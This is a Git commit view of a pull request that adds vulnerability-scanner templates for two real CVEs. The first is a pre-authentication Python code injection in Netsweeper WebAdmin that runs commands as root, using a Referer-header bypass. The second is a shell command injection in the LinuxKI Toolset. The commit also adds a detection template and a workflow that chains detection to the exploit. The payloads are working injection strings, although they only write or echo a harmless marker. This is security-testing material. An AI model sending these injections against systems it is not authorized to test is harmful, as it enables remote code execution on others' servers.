Merge pull request #219 from dwisiswant0/add-cves-and-workflows

Add CVE-2020-13167, CVE-2020-7209 & Workflows
patch-1
bauthard 2020-07-08 09:46:45 +05:30 committed by GitHub
commit 336bac5e1a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 109 additions and 0 deletions

41
cves/CVE-2020-13167.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2020-13167
info:
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
author: dwisiswant0
severity: critical
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer
# header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
# References:
# - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
# - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
requests:
- method: GET
path:
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/nonexistent
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6e6f6e6578697374656e74%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/nonexistent"
headers:
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
Connection: "close"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200

27
cves/CVE-2020-7209.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2020-7209
info:
name: LinuxKI Toolset 6.01 Remote Command Execution
author: dwisiswant0
severity: critical
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
requests:
- method: GET
path:
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
headers:
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: netsweeper-webadmin-detect
info:
name: Netsweeper WebAdmin detected
author: dwisiswant0
severity: informative
requests:
- method: GET
path:
- "{{BaseURL}}/webadmin/start/"
- "{{BaseURL}}/webadmin/tools/systemstatus_remote.php"
headers:
Referer: "http://{{Hostname}}/webadmin/admin/systemstatus_inc_data.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "Version: ([\\d.]+)"
- "Powered by netsweeper"
- "Netsweeper Inc"
condition: or
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,15 @@
id: netsweeper-preauth-rce-workflow
info:
name: Netsweeper PreAuth RCE Workflow
author: dwisiswant0
variables:
netsweeper_webadmin: technologies/netsweeper-webadmin-detect.yaml
netsweeper_webadmin_cve_1: cves/CVE-2020-13167.yaml
logic:
|
if netsweeper_webadmin() {
netsweeper_webadmin_cve_1()
}